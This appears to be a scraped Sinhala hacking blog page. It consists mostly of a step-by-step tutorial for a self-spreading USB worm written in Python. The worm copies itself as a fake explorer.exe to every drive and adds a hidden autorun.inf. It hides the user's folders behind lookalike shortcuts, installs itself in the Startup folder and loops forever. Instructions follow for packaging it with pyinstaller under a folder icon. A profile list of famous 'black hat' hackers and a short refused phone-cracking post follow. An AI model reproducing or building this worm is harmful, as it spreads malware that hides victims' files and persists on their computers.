මෙතනදි මම කරලා තියෙන්නේ මුලින්ම අදාල drive එකට අපේ වෛරස් එක කොපි වෙනවා..ඊලගට ඒක autorun වෙන්න අවශ්‍යය autorun.inf file එක හැදෙනවා..
ඊලගට ඒ දෙකම win32api module එක භාවිතා කරලා hidden files බවට පත් කරවනවා..

දැන් මම අර කිව්ව shortcut එකේ target එකටයි name එකටයි අපේ වෛරස් එක target කරනවා.
ඒ කිව්වේ shortcut එකේ icon එක වෙන්නේ වෛරස් program එකේ icon එක..shortcut කලික් කරාම වෛරස් එක run වෙනවා..


හරි දැන් මේක වැඩ කරන වෙලාවේ removable device එකක් connect කරලා තිබ්බොත් විතරයි වෛරස් එකෙන් බලපෑමක් වෙන්නේ..
ඒත් අපි මේක හදන්න ඕනේ කොයි වෙලේ device එකක් connect කරත් වෛරස් එක පැතිරෙන විදිහටනේ..ඒ නිසා මම ඒකට ඉවරයක් නැතුව repeat වෙන්න loop එකක් දානවා..

import os,shutil,winshell,win32api
drives=['a:\\', 'b:\\','c:\\','d:\\','e:\\', 'f:\\', 'g:\\', 'h:\\', 'i:\\', 'j:\\', 'k:\\', 'l:\\', 'm:\\', 'n:\\', 'o:\\', 'p:\\', 'q:\\', 'r:\\', 's:\\', 't:\\', 'u:\\', 'v:\\', 'w:\\', 'x:\\', 'y:\\', 'z:\\']
HD=True
while HD:
for bomb in drives:
try:
destination = bomb
source = ('explorer.exe')
shutil.copy(source,destination)
myfile=open(destination+'autorun.inf','w')
myfile.write('[AutoRun]\nopen=explorer.exe')
myfile.close()
win32api.SetFileAttributes((destination2+'autorun.inf'),win32con.FILE_ATTRIBUTE_READONLY)
win32api.SetFileAttributes((destination2+'autorun.inf'),win32con.FILE_ATTRIBUTE_HIDDEN)
win32api.SetFileAttributes((destination2+'explorer.exe'),win32con.FILE_ATTRIBUTE_HIDDEN)
except:
pass
try:
fld=[]
folders=os.listdir(bomb)
for moveit in folders:
if '.' not in moveit:
fld.append(moveit)
src=bomb+moveit
dst=bomb+'www\\9\\6\\D\\e\\v\\e\\l\\o\\p\\e\\r\\.\\c\\o\\m\\h\\'+moveit
shutil.move(src,dst)
for nwfl in fld:
winshell.CreateShortcut (
Path=os.path.join (bomb,nwfl+'.lnk'),
Target=bomb+'explorer.exe',
Icon=(bomb+'explorer.exe', 0),
Description="File"
)
except:
pass

එතකොට මට ඊලගට ඕන වෙනවා කෙනෙක්ගේ පරිගනකයට මේක ආසාදනය උනාම එයා පරිගනකය ආරම්බ කරන හැම වෙලාවකම මේ වෛරසය නැවත නැවත ක්‍රියාත්මක කරන්න..
ඒකට මම winshell සහ shutil module භාවිතයෙන් වෛරස් වැඩසටහන startup folder එකට copy කරනවා..


import os,shutil,winshell,win32api
drives=['a:\\', 'b:\\','c:\\','d:\\','e:\\', 'f:\\', 'g:\\', 'h:\\', 'i:\\', 'j:\\', 'k:\\', 'l:\\', 'm:\\', 'n:\\', 'o:\\', 'p:\\', 'q:\\', 'r:\\', 's:\\', 't:\\', 'u:\\', 'v:\\', 'w:\\', 'x:\\', 'y:\\', 'z:\\']
HD=True
while HD:
for bomb in drives:
try:
files=os.listdir(bomb)
if 'explorer.exe' not in files:
destination = bomb
source = ('explorer.exe')
shutil.copy(source,destination)
myfile=open(destination+'autorun.inf','w')
myfile.write('[AutoRun]\nopen=explorer.exe')
myfile.close()
win32api.SetFileAttributes((destination2+'autorun.inf'),win32con.FILE_ATTRIBUTE_READONLY)
win32api.SetFileAttributes((destination2+'autorun.inf'),win32con.FILE_ATTRIBUTE_HIDDEN)
win32api.SetFileAttributes((destination2+'explorer.exe'),win32con.FILE_ATTRIBUTE_HIDDEN)
destination1=winshell.startup ()
source1=sys.executable
shutil.copy(source1,destination1)
os.system(destination1+"\\explorer.exe")
else:
pass
except:
pass
try:
fld=[]
folders=os.listdir(bomb)
for moveit in folders:
if '.' not in moveit:
fld.append(moveit)
src=bomb+moveit
dst=bomb+'www\\9\\6\\D\\e\\v\\e\\l\\o\\p\\e\\r\\.\\c\\o\\m\\h\\'+moveit
shutil.move(src,dst)
for nwfl in fld:
winshell.CreateShortcut (
Path=os.path.join (bomb,nwfl+'.lnk'),
Target=bomb+'explorer.exe',
Icon=(bomb+'explorer.exe', 0),
Description="File"
)
except:
pass

මේක තමා අපේ අවසානයට ලැබුන program එක.. ඔන්න එහෙනම් දැන් අපේ වෛරස් එකේ වැඩ ඉවරයි..දැන් අපි මේක කවුරු හරි කෙනෙක්ට ආසාදනය වෙන විදිහ ආපහු බලමු..

මුලින්ම මම මේකෙන් ආසාදනය වෙච්ච පෙන් එකක් ඔයාට දෙනවා..ඔයාගේ පරිගනකයේ USB autorun on කරලා තියනවනම් කෙලින්ම වෛරස් එක වැඩ කරන්න පටන් ගන්නවා..
එහෙම නැත්තන් ඔයා පෙන් එක open කරාම දකින්නේ පෙන් එකේ තියෙන්න ඕනේ ෆෝල්ඩර වලම බොරු shortcut වගයක්..වැරදිලා ඒකක් ක්ලික් කරත් වෛරස් එක වැඩ කරනවා..

මේ විදිහට වෛරස් එක වැඩ කරන්න ගත්තම එයා මුලින්ම එයාගෙම(වෛරස් එකේම) පිටපත් startup folder එකටයි අනිත් හැම device හා drives වලටයි කොපි කරනවා..
ඊලගට ඒ කොපි කරපු පරිගනකයේ තියන පිටපතකුත් ක්‍රියාත්මක කරවනවා..

ඊලගට අර කිව්ව විදහට ෆයිල් move කරලා shortcut හදනවා..

දැන් මේ program එක run වෙන එක නවතින්නේ නෑ..loop වෙවී දිගටම තියනවා..කොයි වෙලේක හරි removable device එකක් ගහපු ගමන් ඒකටත් කොපි වෙනවා..
ඒකෙන් අයේ පරිගනකයකට කොපි වෙනවා..මෙහෙම දිගටම යනවා..

හරි එහෙනම් මම මේ python වැඩසටහන pyinstaller පාවිච්චි කරලා executable file එකක බවට convert කරගන්නවා..ඒ කරද්දි මම මේ විදිහට තමා Command එක දෙන්නේ..

pyinstaller.py explorer.py --onefile --noconsole --icon=icon.ico

මෙහෙම දෙද්දි pyinstaller folder එකටම මෙන්න මේ ico file එකත් කොපි කරලා තියන්න

http://www.iconj.com/download.php?d=p&file=paohkrbu2w

එතකොට ඔයාගේ වෛරස් එකේ icon එක normal folder එකක icon එකට සමාන වෙයි..මතක ඇතුව එහෙම හදාගත්ත වෛරස් exe file එක explorer.exe කියලා rename කරන්න..
(ඒ කිව්වේ අර මම මුලින්ම කිව්ව නම)

හරි එහෙනම් ඔය විදිහට ලේසියෙන්ම වැඩේ කරගන්න පුලුවන්..

උපුටා ගැනීම
http://srimafia.com/

ලෝකේ හොදම Black Hat Hacker වරු 6දෙනා!

0
COM


මුලින්ම කියන්නම් මේක අපේ Root_x ගේ ලිපියක්
හැකින් කිවුවහම ප්‍රධාන වශයෙන් දෙවර්ගයක් ඉන්නවා Black Hat Hackers and White Hat Hackers ඉතින් අද මම විස්තර ගෙනාවේ ලෝකේ හොදම Black hat Hackers 6දෙනා ගැන එහෙනම් ඔන්න පහලින් ලියලා දැම්ම බලලා හොදනම් Like එකක් හරි Comment එකක් හරි දාන්න හොදේ..

George Hotz
තරුණයි වගේම ගොඩාක් ලොකු හැකියාවක් තියෙනවා මෙයාට..මෙතන තියෙන වැදගත්ම දේ තමා මෙයා තාම teenager කෙනෙක්...එයා ගොඩාක් දවස්වල රෑට hack කරල හොද ෆන් එකක් ගන්න කැමති කෙනෙක් ඒකේ ප්‍රතිපලයක් විදිහට මෙයා Sony company එක හැක් කරා 2007ඒ ජූනි මාසේ පුදුමෙ කියන්නේ ඒ වෙනකොටත් එයාගෙ වයස අවුරුදු 17යි.

Kevin Mitnick
කෙවින් මිට්නික් ලෝකේ පුරාම ගොඩාක් ප්‍රසිද්ධ computer වලින් දත්ත සොරාගන්නා hacker කෙනෙක්...මෙයා ඉන්නේ ඇමෙරිකා වේ.. හැක් කරන්න පටන් ගත්තේ මෙයා විශ්වවිද්‍යාලේ ඉන්න කාලේ..අවුරුදු ගනනාවක් තිස්සේ මෙයා ගොඩාක් companies හැක් කරා..එයා අන්තිමට 1995 දී අත් අඩංගුවට ගත්තා ඊට පස්සේ අවුරුදු 5ක් මෙයා හිරගෙදර හිටියා..

Adrian Lamo

ඇඩ්‍රියන් හදුන්වන්නේ 21ක් වෙනි සියවසේ සිටින හොදම බ්ලැක් හැට් හැකර් විදිහටයි..
එයා ගොඩාක් ප්‍රසිද්ද වෙලා තියෙන්නේ high profile computer networks break කරල තමා..මෙයා ගොඩාක් අයගෙ හැක් කරල 2003 දී අත් අඩංගුවට ගත්තා...

Garry Mckinnon

මෙයා United States military and NASA computers 97 ක් හැක් කරල තියෙනවා..එයා රජයට ලොකු පාඩුවක් කරල තියෙනවා..මෙයා 2002 දී අත් අඩංගුවට ගත්තා.

Jonathan James

මෙයාගේ ජීවිත කථාව ගත්තොත් හරිම දුක හිතෙන එකක්.. 1999දී මෙයාට වයස 15යි ඒත් ඒ වයසෙදිම මෙයා මෙයගෙ ඉස්කෝලේ වෙබ් අඩවිය හැක් කරා...මෙයා ගොඩාක් hack කරල තියෙන්නේ NASA Systems ඒ කරපු dameges හදන්න nasa ආයතනයට ඩොලර් 41,000ක වියදමක් දරන්න වුනා..ඒ ආයතනය මෙයා හැක් කරේ software එකක් ගන්න ඒ softwere එකේ මිල ඩොලර් මිලියන 1.7 ක්..මෙයා සල්ලි පස්සේ දුවපු කෙනෙක් කියල මේක කියවන ඕනි කෙනෙකුට තේරුම් යනව ඇතිනේ ඊට පස්සේ මෙයා මාස 6ක් නිවාස අඩස්සියේ හිටියා..මෙයාට ආයෙ ජීවිත කාලෙටම computer එකක් භාවිතා කරන්න අයිතිය නැති කරා..


Kevin Paulsen

මෙයත් තවත් බයානක හැකර් කෙනෙක් තමා මෙයා fbi එක හැක් කරා ඊට පස්සේ phone lines,radio stations වගේ ඒවත් මෙයාගෙ ගොදුරු බවට පත් වුනා අන්තිමට මෙයාව FBI එකෙන් අල්ලගත්තා..


අවසාන වශයෙන් කියන්න තියෙන්නේ හැක් කරාවගේ නෙවෙයි හිරේට ට්‍රිප් එක යන්නත් ලෑස්ති වෙලා ඉන්න ඕන....


උපුටා ගැනීම
http://srimafia.com/index.php

ෆෝන් හැක් කරමු.. (ක්‍රැකින්)

0
COM

http://diary.com/


සමාවන්න..
මෙය කියාදිය නොහැක..